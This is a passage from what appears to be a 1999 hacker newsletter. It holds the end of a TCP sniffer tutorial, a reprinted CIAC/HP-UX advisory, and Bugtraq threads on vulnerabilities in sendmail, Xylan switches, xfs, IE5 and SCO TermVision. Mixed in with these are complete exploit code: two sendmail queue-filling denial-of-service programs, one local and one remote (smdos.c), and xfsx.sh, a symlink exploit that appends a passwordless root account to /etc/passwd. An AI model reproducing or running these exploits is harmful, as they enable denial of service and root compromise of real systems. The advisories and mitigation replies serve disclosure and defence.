beginning of the tcp header which follows the ip header in the buffer as so : |----------------- buffer ---------------| ________________________________________ | ip header | tcp header | | |___________|____________|_______________| ^ *tcp This is why we use 4*ip->ip_length to find the start of the tcp header. Line 25-26: printf("Source port ::: %d\n",ntohs(tcp->tcp_source_port); printf("Dest port ::: %d\n",ntohs(tcp->tcp_dest_port)); We can now access the source and dest ports which are located in the tcp header via the structure as defined above. This will conclude our first very simple tcp sniffer. This was a very basic application that should help define how to access packets passing on the network and how to use sockets to access the packets. Hopefully this will be the first of many papers to come, which each proceeding paper we will add a new or more complex feature to the sniffer. I should also mention that there a number of great resources on the net that should aid you in further research in this area : 1. Beej's Guide to Network Programming This is an awesome paper that really helps clear up any misconceptions about network programming. [http://www.ecst.csuchico.edu/~beej/guide/net] 2. TCP/IP Illustrated Vol 1,2,3 W.Richard Stevens To use the above program, cut out the above code and strip off all of the line numbers. Save the edited file as sniff.c. Next cut out the header file headers.h (below) and save it to a file headers.h in the same directory. Now just compile: gcc -o sniff sniff.c You should now have the executable "sniff", to run it type #./sniff /*************************headers.h**************************/ /*structure of an ip header */ struct ip { unsigned int ip_length:4; /*little-endian*/ unsigned int ip_version:4; unsigned char ip_tos; unsigned short ip_total_length; unsigned short ip_id; unsigned short ip_flags; unsigned char ip_ttl; unsigned char ip_protocol; unsigned short ip_cksum; unsigned int ip_source; unsigned int ip_dest; }; /* Structure of a TCP header */ struct tcp { unsigned short tcp_source_port; unsigned short tcp_dest_port; unsigned int tcp_seqno; unsigned int tcp_ackno; unsigned int tcp_res1:4, /*little-endian*/ tcp_hlen:4, tcp_fin:1, tcp_syn:1, tcp_rst:1, tcp_psh:1, tcp_ack:1, tcp_urg:1, tcp_res2:2; unsigned short tcp_winsize; unsigned short tcp_cksum; unsigned short tcp_urgent; }; /*********************EOF***********************************/ * @HWA 09.0 CIAC Security advisory on HP-UX ftp,hpterm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Missed this is last issue, go figure I was having a month.... Date: Wed, 31 Mar 1999 11:30:48 -0800 (PST) From: CIAC Mail User To: ciac-bulletin@rumpole.llnl.gov Subject: CIAC Bulletin J-038: HP-UX Vulnerabilities (hpterm, ftp) [ For Public Release ] -----BEGIN PGP SIGNED MESSAGE----- __________________________________________________________ The U.S. Department of Energy Computer Incident Advisory Capability ___ __ __ _ ___ / | /_\ / \___ __|__ / \ \___ __________________________________________________________ INFORMATION BULLETIN HP-UX Vulnerabilities (hpterm, ftp) H-P Security Bulletins #00093 and #00094 March 31, 1999 15:00 GMT Number J-038 ______________________________________________________________________________ PROBLEM: Two vulnerabilities have been identified by Hewlett-Packard Company. 1) PHSS_13560 introduced a library access problem into hpterm. 2) There is a Security Vulnerability during ftp operations. PLATFORM: 1) HP9000 Series 700 and Series 800, HP-UX release 10.20 only. 2) HP9000 Series 7/800 running HP-UX release 11.00 only. DAMAGE: Users can gain increased privileges. SOLUTION: Apply patches. ______________________________________________________________________________ VULNERABILITY Risk is high. Both of these vulnerabilities affect systems ASSESSMENT: security. Patches should be applied as soon as possible. ______________________________________________________________________________ [Start Hewlett-Packard Company Advisory] 1) PHSS_13560 Document ID: HPSBUX9903-093 Date Loaded: 19990317 Title: Security Vulnerability with hpterm on HP-UX 10.20 - ----------------------------------------------------------------------- HEWLETT-PACKARD COMPANY SECURITY BULLETIN: #00093, 18 March 1999 - ----------------------------------------------------------------------- The information in the following Security Bulletin should be acted upon as soon as possible. Hewlett-Packard Company will not be liable for any consequences to any customer resulting from customer's failure to fully implement instructions in this Security Bulletin as soon as possible. - ----------------------------------------------------------------------- PROBLEM: PHSS_13560 introduced a library access problem into hpterm. PLATFORM: HP9000 Series 700 and Series 800, HP-UX release 10.20 only. DAMAGE: Users can gain increased privileges. SOLUTION: Install PHSS_17830. AVAILABILITY: The patch is available now. - ----------------------------------------------------------------------- I. A. Background PHSS_13560 introduced a library access problem into hpterm, the terminal emulator for the X Window system. (See hpterm(1)). B. Fixing the problem Installing patch PHSS_17830 completely fixes this problem. NOTE: Three older hpterm patches have been released including PHSS_13560, PHSS_15431, and PHSS_17332. All of these older patches are being superseded with the release of the PHSS_17830. Do not use PHSS_13560, PHSS_15431, or PHSS_17332. C. To subscribe to automatically receive future NEW HP Security Bulletins from the HP Electronic Support Center via electronic mail, do the following: Use your browser to get to the HP Electronic Support Center page at: http://us-support.external.hp.com (for US, Canada, Asia-Pacific, & Latin-America) http://europe-support.external.hp.com (for Europe) Login with your user ID and password (or register for one). Remember to save the User ID assigned to you, and your password. Once you are in the Main Menu: To -subscribe- to future HP Security Bulletins, click on "Support Information Digests". To -review- bulletins already released from the main Menu, click on the "Technical Knowledge Database (Security Bulletins only)". Near the bottom of the next page, click on "Browse the HP Security Bulletin Archive". Once in the archive there is another link to our current Security Patch Matrix. Updated daily, this matrix categorizes security patches by platform/OS release, and by bulletin topic. The security patch matrix is also available via anonymous ftp: us-ffs.external.hp.com ~ftp/export/patches/hp-ux_patch_matrix D. To report new security vulnerabilities, send email to security-alert@hp.com Please encrypt any exploit information using the security-alert PGP key, available from your local key server, or by sending a message with a -subject- (not body) of 'get key' (no quotes) to security-alert@hp.com. Permission is granted for copying and circulating this Bulletin to Hewlett-Packard (HP) customers (or the Internet community) for the purpose of alerting them to problems, if and only if, the Bulletin is not edited or changed in any way, is attributed to HP, and provided such reproduction and/or distribution is performed for non-commercial purposes. Any other use of this information is prohibited. HP is not liable for any misuse of this information by any third party. _____________________________________________________________________ - ---End of Document ID: HPSBUX9903-093--------------------------------- 2) ftp Document ID: HPSBUX9903-094 Date Loaded: 19990323 Title: Security Vulnerability with ftp on HP-UX 11.00 - ----------------------------------------------------------------------- HEWLETT-PACKARD COMPANY SECURITY BULLETIN: #00094, 24 March 1999 - ----------------------------------------------------------------------- The information in the following Security Bulletin should be acted upon as soon as possible. Hewlett-Packard Company will not be liable for any consequences to any customer resulting from customer's failure to fully implement instructions in this Security Bulletin as soon as possible. - ----------------------------------------------------------------------- PROBLEM: Security Vulnerability during ftp operations. PLATFORM: HP9000 Series 7/800 running HP-UX release 11.00 only. DAMAGE: Users can increase privileges SOLUTION: Apply the patch specified below AVAILABILITY: The patch is available now. - ----------------------------------------------------------------------- I. A. Background Hewlett-Packard Company has found that during normal operations, the ftp program might grant users increased privileges. B. Fixing the problem Obtaining and installing the following patch will completely close this vulnerability. Rebooting the system will NOT be required. For all HP9000 S7/800 platforms running HP-UX 11.00: PHCO_17601 C. To subscribe to automatically receive future NEW HP Security Bulletins or access the HP Electronic Support Center, use your browser to get to our ESC web page at: http://us-support.external.hp.com (for non-European locations), or http://europe-support.external.hp.com (for Europe) Login with your user ID and password (or register for one). Remember to save the User ID/password assigned to you. Once you are in the Main Menu: To -subscribe- to future HP Security Bulletins, click on "Support Information Digests". To -review Security bulletins already released-, click on the "Search Technical Knowledge Database." To -retrieve patches-, click on "Individual Patches" and select appropriate release and locate with the patch identifier (ID). To -browse the HP Security Bulletin Archive-, select the link at the bottom of the page once in the "Support Information Digests". To -view the Security Patch Matrix-, (updated daily) which categorizes security patches by platform/OS release, and by bulletin topic, go to the archive (above) and follow the links. The security patch matrix is also available via anonymous ftp: us-ffs.external.hp.com or ~ftp/export/patches/hp-ux_patch_matrix D. To report new security vulnerabilities, send email to security-alert@hp.com Please encrypt any exploit information using the security-alert PGP key, available from your local key server, or by sending a message with a -subject- (not body) of 'get key' (no quotes) to security-alert@hp.com. Permission is granted for copying and circulating this Bulletin to Hewlett-Packard (HP) customers (or the Internet community) for the purpose of alerting them to problems, if and only if, the Bulletin is not edited or changed in any way, is attributed to HP, and provided such reproduction and/or distribution is performed for non-commercial purposes. Any other use of this information is prohibited. HP is not liable for any misuse of this information by any third party. ______________________________________________________________________ - ---End of Document ID: HPSBUX9903-094--------------------------------- [End Hewlett-Packard Company Advisory] ___________________________________________________________________________ CIAC wishes to acknowledge the contributions of Hewlett-Packard Company for the information contained in this bulletin. ___________________________________________________________________________ CIAC, the Computer Incident Advisory Capability, is the computer security incident response team for the U.S. Department of Energy (DOE) and the emergency backup response team for the National Institutes of Health (NIH). CIAC is located at the Lawrence Livermore National Laboratory in Livermore, California. CIAC is also a founding member of FIRST, the Forum of Incident Response and Security Teams, a global organization established to foster cooperation and coordination among computer security teams worldwide. CIAC services are available to DOE, DOE contractors, and the NIH. CIAC can be contacted at: Voice: +1 925-422-8193 FAX: +1 925-423-8002 STU-III: +1 925-423-2604 E-mail: ciac@llnl.gov For emergencies and off-hour assistance, DOE, DOE contractor sites, and the NIH may contact CIAC 24-hours a day. During off hours (5PM - 8AM PST), call the CIAC voice number 925-422-8193 and leave a message, or call 800-759-7243 (800-SKY-PAGE) to send a Sky Page. CIAC has two Sky Page PIN numbers, the primary PIN number, 8550070, is for the CIAC duty person, and the secondary PIN number, 8550074 is for the CIAC Project Leader. Previous CIAC notices, anti-virus software, and other information are available from the CIAC Computer Security Archive. World Wide Web: http://www.ciac.org/ (or http://ciac.llnl.gov -- they're the same machine) Anonymous FTP: ftp.ciac.org (or ciac.llnl.gov -- they're the same machine) Modem access: +1 (925) 423-4753 (28.8K baud) +1 (925) 423-3331 (28.8K baud) CIAC has several self-subscribing mailing lists for electronic publications: 1. CIAC-BULLETIN for Advisories, highest priority - time critical information and Bulletins, important computer security information; 2. SPI-ANNOUNCE for official news about Security Profile Inspector (SPI) software updates, new features, distribution and availability; 3. SPI-NOTES, for discussion of problems and solutions regarding the use of SPI products. Our mailing lists are managed by a public domain software package called Majordomo, which ignores E-mail header subject lines. To subscribe (add yourself) to one of our mailing lists, send the following request as the E-mail message body, substituting ciac-bulletin, spi-announce OR spi-notes for list-name: E-mail to ciac-listproc@llnl.gov or majordomo@tholia.llnl.gov: subscribe list-name e.g., subscribe ciac-bulletin You will receive an acknowledgment email immediately with a confirmation that you will need to mail back to the addresses above, as per the instructions in the email. This is a partial protection to make sure you are really the one who asked to be signed up for the list in question. If you include the word 'help' in the body of an email to the above address, it will also send back an information file on how to subscribe/unsubscribe, get past issues of CIAC bulletins via email, etc. PLEASE NOTE: Many users outside of the DOE, ESnet, and NIH computing communities receive CIAC bulletins. If you are not part of these communities, please contact your agency's response team to report incidents. Your agency's team will coordinate with CIAC. The Forum of Incident Response and Security Teams (FIRST) is a world-wide organization. A list of FIRST member organizations and their constituencies can be obtained via WWW at http://www.first.org/. This document was prepared as an account of work sponsored by an agency of the United States Government. Neither the United States Government nor the University of California nor any of their employees, makes any warranty, express or implied, or assumes any legal liability or responsibility for the accuracy, completeness, or usefulness of any information, apparatus, product, or process disclosed, or represents that its use would not infringe privately owned rights. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not necessarily constitute or imply its endorsement, recommendation or favoring by the United States Government or the University of California. The views and opinions of authors expressed herein do not necessarily state or reflect those of the United States Government or the University of California, and shall not be used for advertising or product endorsement purposes. LAST 10 CIAC BULLETINS ISSUED (Previous bulletins available from CIAC) J-027: Digital Unix Vulnerabilities ( at , inc ) J-028: Sun Solaris Vulnerabilities (sdtcm_convert, man/catman, CDE) J-029: Buffer Overflows in Various FTP Servers J-030: Microsoft BackOffice Vulnerability J-031: Debian Linux "Super" package Buffer Overflow J-032: Windows Backdoors Update II: J-034: Cisco 7xx TCP and HTTP Vulnerabilities J-035: Linux Blind TCP Spoofing J-036: LDAP Buffer overflow against Microsoft Directory Services J-037: W97M.Melissa Word Macro Virus -----BEGIN PGP SIGNATURE----- Version: 4.0 Business Edition iQCVAwUBNwJkHLnzJzdsy3QZAQHrWAP9E27Nc3P8XLWJ1IM/JOzMdHy5mvymnUdh dzkEuldX35r+KGPlZYGxAq6NbKeYQFgi24C1OHg7V/MhcgnXKHPB6DN7Zdd6g6ii sUAnZ7LD3MqQb7OIMq2D3GdWzLzn/u5qpanKt1VjNYtQCGi4RbH9YgJFnLFgma8I dX/jer4bE6M= =Q2lE -----END PGP SIGNATURE----- @HWA 10.0 Sendmail DoS on versions up to the latest version 8.9.3 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Thu, 1 Apr 1999 14:00:16 +0000 From: Lukasz Luzar To: BUGTRAQ@netspace.org Subject: Possible local DoS in sendmail Hi, It seems that sendmail ran with -t option does NOT block SIGINT ... In that moment while we are sending data to its stdin, when we will press CTRL-C process is being killed, but in queue rests unfinished letter. It stays there quite long - long enought to fullfill partition on disk where /var/spool/mqueue resides. When it happends, sendmail doesn't allow new connections - so it is a kind of DoS attack for this service. It has been tested on all new versions on sendmail up to current (8.9.3). Example ... --- CUT HERE ---- #include #include #include #include #define DELAY 5 /* time in seconds needed to reach MaxMessageSize limit */ #define SM_PATH "/usr/sbin/sendmail -t" void main() { FILE *fd; int pid; for(;;) { if(( pid = fork()) == 0) { setpgrp(); if(( fd = popen( SM_PATH, "w")) == NULL) fprintf( stderr, "popen error\n"); for(;;) fputc( 'A', fd); } else { sleep( DELAY); kill( (-1) * pid, SIGINT); fprintf( stdout, "next\n"); wait( NULL); } } } --- CUT HERE --- Regards, --- Lukasz Luzar K.K.I. http://noname.kki.krakow.pl/ lluzar@kki.pl --------------------------------------------------------------------- Date: Thu, 1 Apr 1999 14:41:41 -0500 From: KuRuPTioN To: BUGTRAQ@netspace.org Subject: Re: Possible local DoS in sendmail Well, this is very interesting... this is what I found my running this binary for 30 seconds =) Before: # df / Filesystem 1024-blocks Used Available Capacity Mounted on /dev/hda1 303251 87681 199909 30% / # ps auwx | grep sendmail root 1427 0.0 0.4 1324 816 ? S Mar 27 0:00 sendmail: accepting connections on port 25 # ls -l /var/spool/mqueue total 0 # After (30 seconds running): # df / Filesystem 1024-blocks Used Available Capacity Mounted on /dev/hda1 303251 107548 180042 37% / (not too bad but another 30 seconds later another df) Filesystem 1024-blocks Used Available Capacity Mounted on /dev/hda1 303251 146235 141355 51% / # ps auwx | grep sendmail mail 17144 70.5 0.4 1348 820 p1 R 11:35 0:48 /usr/sbin/sendmail -t root 1427 0.0 0.4 1324 816 ? S Mar 27 0:00 sendmail: accepting connections on port 25 (sendmail kindly using 70% of my CPU) # ls -l /var/spool/mqueue total 115854 -rw------- 1 mail mail 118169600 Apr 1 11:37 dfLAA17144 -rw------- 1 mail mail 0 Apr 1 11:35 qfLAA17144 -rw------- 1 mail mail 0 Apr 1 11:35 xfLAA17144 (once again a df) # df / Filesystem 1024-blocks Used Available Capacity Mounted on /dev/hda1 303251 224734 62856 78% / and once the hard drive becomes filled sendmail stops accepting connections since it has no temp space. # df / Filesystem 1024-blocks Used Available Capacity Mounted on /dev/hda1 303251 287590 0 100% / # ps auwx | grep sendmail mail 17144 68.5 0.4 1348 820 p1 R 11:35 2:33 /usr/wrapped/sendmail -t root 1427 0.0 0.4 1324 816 ? S Mar 27 0:00 sendmail: rejecting connections on port 25: min free: 100 # People, this is no april fools joke =) Raymond T Sundland MCSE, MCP, MCP+Internet PGP Key: finger pgp@24.3.181.22 ----------------------------------------------------------------------------------- Date: Fri, 2 Apr 1999 10:23:26 -0800 From: Gregory Neil Shapiro To: BUGTRAQ@netspace.org Subject: Re: Possible local DoS in sendmail -----BEGIN PGP SIGNED MESSAGE----- Lukasz> In that moment while we are sending data to its stdin, when we will Lukasz> press CTRL-C process is being killed, but in queue rests unfinished Lukasz> letter. It stays there quite long - long enought to fullfill Lukasz> partition on disk where /var/spool/mqueue resides. When it Lukasz> happends, sendmail doesn't allow new connections - so it is a kind Lukasz> of DoS attack for this service. It has been tested on all new Lukasz> versions on sendmail up to current (8.9.3). Thanks for posting this info Lukasz. Unfortunately we believe this is just a variation on the many Denial of Service attacks possible from a Unix shell. In fact, it's "yet another queue filling" exercise. This problem affects most, if not all MTAs. Interestingly, the proposed DOS is less severe than the usual queue filling strategies such as repeatedly submitting large mails to an undeliverable address, such as someone@[10.255.255.255]. The reason for this is that the derelict files will be removed by the next scheduled queue run. In the case of legitimately queued mail, it will take the full queue return timeout before the queue entry is removed (assuming a lack of intervention on the administrator's part). The valid point you do raise is that shell-based DOS attacks are hard to deal with. In many cases, the only recourse is to identify and stop the offender. In this case we suggest that if this attack is a possibility at your site, you use process accounting to help trace the malicious user. Also, unless your script gets the timing exactly right every time, the queue submission will complete which will give more information about the identity of the attacker. As a side note, setting the MaxMessageSize option prevents any one message from filling the queue. Having said that, it does point out that sendmail could log the username and queue ID earlier to help make tracing this sort of attack even easier. We will look into the benefits of doing this for a future release. Lukasz as a final point, we really appreciate you raising this issue but in the future, we would prefer some consultation prior to posting to bugtraq. This will allow us to have all of the information available at the time of the posting. The address to contact us is sendmail-bugs@sendmail.org. Conclusion. Queue filling DOS attacks are not unique to sendmail. This is not a new problem. There is no general solution to this and many other DOS attacks apart from identifying and stopping the malicious user. -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 5.0 for non-commercial use Comment: Processed by Mailcrypt 3.5.3, an Emacs/PGP interface Charset: noconv iQCVAwUBNwUKvXxLZ22gDhVjAQEv9QP9EgU5zmNeAZ63tUiRoq3C6OSbXEJ4yvw4 PLCkOWUJ4etCzBKa5i1/SCa9/mW+WHmR3WobNCI5m8Y9AqYjSSe+gQgnWXXH5CJH fRgtRNrvVewAIsW84QRQDFdapLPiq4ZZbEu7w55WNVdgnZwwTqXGeLJEgP+cAcTl ehf8dKqtahk= =7/+l -----END PGP SIGNATURE----- Date: Sat, 3 Apr 1999 00:42:56 +0200 From: "[iso-8859-2] Micha³ Szymañski" To: BUGTRAQ@netspace.org Subject: Re: Possible local DoS in sendmail Hi folks, This local queue filling DoS attack in sendmail is quite dangerous. But good security policy (like mine) will prevent attackers from doing such things. Control files (in /var/spool/mqueue) created by 'sendmail -t' are owned by root.attacker's_group; turn on quotas for group 'attacker's_group' on the file system containing /var/spool/mqueue directory, and your host will be not vulnerable; but you _have to_ configure your sendmail as _nosuid_ daemon; Much more dangerous are remote queue filling DoS attacks. If you have enabled relaying, you can use shown below smdos.c proggie; it will quite fast fullfill partition on disk where /var/spool/mqueue resides. you should notice increased LA during attack; in contrast to local DoS attacks, control files created by smdos.c are owned by root.root, so ... it's much more difficult to prevent offenders from doing it; don't forget to change BSIZE definition (in smdos.c) to appropriate victim's host message size limitation (MaxMessageSize option); you can also increase MAXCONN definition. smdos.c: --- CUT HERE --- /* By Michal Szymanski Sendmail DoS (up to 8.9.3); Sat Apr 3 00:12:31 CEST 1999 */ #include #include #include #include #include #include #include #undef VERBOSE /* define it, if MORECONN is undefined */ #define MORECONN // #define RCPT_TO "foo@ftp.onet.pl" #define RCPT_TO "foo@10.255.255.255" #ifdef MORECONN #define MAXCONN 5 #endif #define BSIZE 1048576 /* df* control file size */ #define PORT 25 char buffer[BSIZE]; int sockfd,x,loop,chpid; void usage(char *fname) { fprintf(stderr,"Usage: %s \n",fname); exit(1); } void say(char *what) { if (write(sockfd,what,strlen(what))<0) { perror("write()"); exit(errno); } #ifdef VERBOSE fprintf(stderr,"<%s",what); #endif bzero(buffer,BSIZE); usleep(1000); if (read(sockfd,buffer,BSIZE)<0) { perror("read()"); exit(errno); } #ifdef VERBOSE fprintf(stderr,buffer); #endif } int main(int argc,char *argv[]) { struct sockaddr_in serv_addr; struct hostent *host; char *hostname,hostaddr[20]; fprintf(stderr,"Sendmail DoS (up to 8.9.3) by siwa9 [siwa9@box43.gnet.pl]\n"); if (argc<2) usage(argv[0]); #ifdef VERBOSE fprintf(stderr,">Preparing address. \n"); #endif hostname=argv[1]; serv_addr.sin_port=htons(PORT); serv_addr.sin_family=AF_INET; if ((serv_addr.sin_addr.s_addr=inet_addr(hostname))==-1) { #ifdef VERBOSE fprintf(stderr,">Getting info from DNS.\n"); #endif if ((host=gethostbyname(hostname))==NULL) { herror("gethostbyname()"); exit(h_errno); } serv_addr.sin_family=host->h_addrtype; bcopy(host->h_addr,(char *)&serv_addr.sin_addr,host->h_length); #ifdef VERBOSE fprintf(stderr,">Official name of host: %s\n",host->h_name); #endif hostname=host->h_name; sprintf(hostaddr,"%d.%d.%d.%d",(unsigned char)host->h_addr[0], (unsigned char)host->h_addr[1], (unsigned char)host->h_addr[2], (unsigned char)host->h_addr[3]); } else sprintf(hostaddr,"%s",hostname); #ifdef MORECONN for (;loopConnected to [%s:%d].\n",hostname,PORT); #endif bzero(buffer,BSIZE);read(sockfd,buffer,BSIZE); #ifdef VERBOSE fprintf(stderr,buffer); #else fprintf(stderr,"."); #endif say("helo foo\n"); say("mail from:root@localhost\n"); say("rcpt to:" RCPT_TO "\n"); say("data\n"); for (x=0;x<=BSIZE;x++) buffer[x]='X';write(sockfd,buffer,BSIZE); say("\n.\n"); sleep(1); say("quit\n"); shutdown(sockfd,2); close(sockfd); #ifdef VERBOSE fprintf(stderr,">Connection closed succesfully.\n"); #endif } #ifdef MORECONN } waitpid(chpid,NULL,0); #endif return 0; } --- CUT HERE --- @HWA 11.0 Xylan Omniswitch 'features' (DoS) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Wed, 31 Mar 1999 19:12:20 +0000 From: pmsac@TOXYN.ORG To: BUGTRAQ@netspace.org Subject: Xylan OmniSwitch "features" Sorry if this is already known. Stepped into two "features" of Xylan OmniSwitches (also works on Pizza). These switches are sold OEM to Alcatel (which just bought Xylan) and IBM. Number one: anyone can telnet to the switch and login, without knowing either user or passwod strings. No permission will be given to perform any command, which is not so bad. This could work as a DoS, because software versions until 3.1.8 (don't know about later ones) only allow one interactive session, displaying a message of "System alread in use" in other attempts. However, since you can do this DoS even without logging in (just sitting at the login prompt) it's not much of a DoS. Number two: anyone can ftp to the switch, whitout knowing either user or password strings. Everyone is allowed to read all files in the flash, and even upload files (but not remove or overwrite existing ones). Since reading all files gives access to SNMP community strings, this could be trouble, which are stored in clear text on one of the files, and writing files, well, just use your imagination. This was tested on software version 3.1.8 (the lastest I can access). Thanks to cock@p.ulh.as, which helped test the vulnerability. Have a nice day. Disclaimers: - This "feature" report was only sent here, personal option; software that's worth thounsands of dollars should be better beta tested; - I do know switches aren't generally accessible from the internet. @HWA 12.0 xfs exploitability warning ~~~~~~~~~~~~~~~~~~~~~~~~~~ Bug in xfs Lukasz Trabinski (lukasz@LT.WSISIZ.EDU.PL) Tue, 30 Mar 1999 00:14:34 +0200 Hello, I hope that's information will be useful for making new patch for XFree86. I found bug in xfs (Packet XFree86-xfs-3.3.3.1-1 in RedHat 5.1 and probably in RedHat 5.2 updates, too) Xfs is a font server for XFree86, it's also create directory in /tmp That directory name .font-unix Let's make a little check: On first console (I logged as a normal user) [lukasz@lt /tmp]$ cat /etc/shadow cat: /etc/shadow: Permission denied [lukasz@lt /tmp]$ ls -all /etc/shadow -r-------- 1 root root 544 Mar 30 00:04 /etc/shadow [lukasz@lt /tmp]$ ll total 2 drwxrwxrwt 2 root root 1024 Mar 30 00:05 . drwxr-xr-x 18 root root 1024 Mar 23 00:10 .. lrwxrwxrwx 1 lukasz users 11 Mar 30 00:05 .font-unix -> /etc/shadow On second console, as root [root@lt /root]# xfs & [1] 2021 [root@lt /root]# _FontTransSocketCreateListener: failed to bind listener _FontTransSocketUNIXCreateListener: ...SocketCreateListener() failed _FontTransMakeAllCOTSServerListeners: failed to create listener for local On first console: [lukasz@lt /tmp]$ ls -all /etc/shadow -rwxrwxrwt 1 root root 544 Mar 30 00:04 /etc/shadow ^^^^^^^^^^^ That's all ;) Solution, As root before run xfs, make rm -rf /tmp/.font-unix Sorry for my broken English ;( _[ Lukasz Trabinski ]_ PgP Key: finger:lukasz@oceanic.wsisiz.edu.pl, SysAdmin @wsisiz.edu.pl ----------------------------------------------------------------------- Re: Bug in xfs Matthieu Herrb (matthieu@laas.fr) Wed, 31 Mar 1999 08:04:17 +0200 You wrote (in your message from Tuesday 30) > > I hope that's information will be useful for making new patch for > XFree86. > > I found bug in xfs This is caused by the same bug in xc/lib/xtrans that "in.telnetd" reported under the subject "X11R6 NetBSD Security Problem" last week. The patch I submitted (with stat() replaced by lstat(), as noted by Kevin Vajk and other) also fixes that. -- Matthieu ----------------------------------------------------------------------- Re: Bug in xfs Juha Virtanen (jiivee@iki.fi) Wed, 31 Mar 1999 09:38:28 +0300 Regardless of the bug Lukasz Trabinski found in xfs -- it should be fixed and similar bugs traced from other software as well -- it is not necessary to run xfs with root permissions at all. Someone may unknowingly argue that it needs to listen a port. Yes, but that's usually port 7100, and as it's not under 1024 limit, so root permission isn't needed. I've run xfs for ages on separate account. below is the significant startup line I use in RedHat 5.x systems: daemon /bin/su fontsvr -c "/usr/X11/bin/xfs -config /etc/X11/fs/config -port 7100 &" The rule is: if a daemon can do its work with lower permissions than root, it should. I do also run named as nonroot permissions (Startup /usr/sbin/named -u user -g group). I recommend other people doing this as well. Juha Virtanen -- ----------------------------------------------------------------------- Re: Bug in xfs Alan Cox (alan@LXORGUK.UKUU.ORG.UK) Wed, 31 Mar 1999 10:25:07 +0100 > I do also run named as nonroot permissions (Startup > /usr/sbin/named -u user -g group). I recommend other people > doing this as well. This isnt one to do blindly as it means named cannot bind to interfaces that appear dynamically (eg as a DNS cache on a terminal server). The fact that you end up having to run named as root or with the relevant capability to allow it to bind to low ports. Alan ----------------------------------------------------------------------- Re: Bug in xfs Roman Drahtmueller (draht2@RZLIN1.RUF.UNI-FREIBURG.DE) Wed, 31 Mar 1999 05:10:14 +0200 [snip] > [lukasz@lt /tmp]$ ls -all /etc/shadow > -r-------- 1 root root 544 Mar 30 00:04 /etc/shadow [snip] > [root@lt /root]# xfs & [snip] > [lukasz@lt /tmp]$ ls -all /etc/shadow > -rwxrwxrwt 1 root root 544 Mar 30 00:04 /etc/shadow [snip] > Solution, As root before run xfs, make rm -rf /tmp/.font-unix For sure this needs to be fixed. Your "solution" introduces a race condition, though, if the font server is started when users are allowed to log on. A better interim aid is not to run xfs as root in the first place. In fact, why would one want to run things as root if not necessary? Roman. Computer Center University of Freiburg, Germany. "The whole world is about three drinks behind." (Humphrey Bogart) @HWA 12.1 xfsx.sh - Very simple shell script exploit code for the recently discovered xfs security hole. By ArchAng3| of Death, Midgard Security Team. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #!/bin/sh # X Font Server **exploit** # ArchAng3| of Death -- Member Of Midgard Security Team # usage: xfsx & # the proggie stays in the background checking for write access to # /etc/passwd when it haves write access it creates an account and # mails back at you. if [ -f /tmp/.font-unix ]; then echo "File already exists..." echo "Aborting..." exit else echo "Creating symlink to /etc/passwd..." ln -s /etc/passwd /tmp/.font-unix echo "Symlink created..." echo "Now just wait until root executes xfs..." while (true); do sleep 60; if [ -w /etc/passwd ]; then echo "r00t::0:0:r00t:/:/bin/bash" >> /etc/passwd echo "0wn3d..." > .xfsxtmp666 echo `cat /etc/passwd |grep r00t` >> .xfsxtmp666 echo "su r00t might be a good thing to do ..." >> .xfsxtmp666 cat .xfsxtmp666 |mail `whoami` rm -f .xfsxtmp666 rm -f /tmp/.font-unix exit fi; done fi @HWA 13.0 Bug allows remote systems to read local files remotely in MSIE5 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Tue, 30 Mar 1999 19:35:16 +0300 From: Georgi Guninski To: BUGTRAQ@netspace.org Subject: IE 5.0 allows reading and sending local files to a remote server There is a security bug in Internet Explorer 5.0, which allows reading and sending local files to a remote server. The problem is a bug in the DHTML edit control, which allows pasting a filename in a FILE object. When the form is submitted via JavaScript, the contents of the file are sent to a remote server. Demonstration is available at: http://www.nat.bg/~joro/fr.html Workaround: Disable JavaScript I would like to thank Juan Cuartango (http://pages.whowhere.com/computers/cuartangojc/index.html) for his IE exploits, which helped me a lot for discovering this vulnerability! Regards, Georgi Guninski http://www.nat.bg/~joro ------------------------------------------------------------------------- [http://www.nat.bg/~joro/fr.html] ------------------------------------------------------------------------- Date: Wed, 31 Mar 1999 09:14:47 +0100 From: Andrew Tulloch To: BUGTRAQ@netspace.org Subject: Re: IE 5.0 allows reading and sending local files to a remote server If you look under scripting options in security settings there is the option "Allow paste via script" simply turning this to disabled provides this result: See the contents of your file among the other stuff ---------------------------------------------------------------------------- ---- -----------------------------7cf26c3b6a8 Content-Disposition: form-data; name = "a"; filename="" Content-Type: application/octet-stream -----------------------------7cf26c3b6a8-- which as far as I see has disabled the reading of local files and is a little less drastic than disabling all JavaScript. Regards, Andrew Tulloch ------------------------------------------------------------------------- Date: Wed, 31 Mar 1999 14:05:21 -0800 From: "Stephen Purpura (MSFDC-JV)" To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: Re: IE 5.0 allows reading and sending local files to a remote server There is another workaround. In IE5, if you use the "built in" feature to limit scripted paste operations then the problem doesn't seem to manifest. Try the following and goto the sample implementation: Tools menu --> Internet options --> security tab --> custom level --> allow paste operations via script = prompt or disable Stephen @HWA 14.0 Possible root/user level compromise in SCO TermVision ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Wed, 31 Mar 1999 16:50:13 +0100 From: JJ Gray To: BUGTRAQ@netspace.org Subject: Potential vulnerability in SCO TermVision Windows 95 client Hi folks, I recently downloaded a trial version of the SCO TermVision terminal emulation package for SCO Openserver 5 and Windows 95 ( http://www.sco.com/vision/products/termvision/ ). This comes in two parts, the server based binaries and the Windows 95 client, TermVision 2.1. In addition to the terminal emulation you get 'UNIX Neighborhood' which once supplied with a hostname, username & password gives an explorer/X-Windows style interface to the SCO server. In the default configuration the hostnames, usernames & passwords are saved in a file : C:\Windows\Profiles\%username%\Application Data\SCO\Vision\Auth\%username%.vca ( PC is Windows 95, NT4 server, user profiles ). The data is encrypted but, not being a cryptanalysist, it took me a 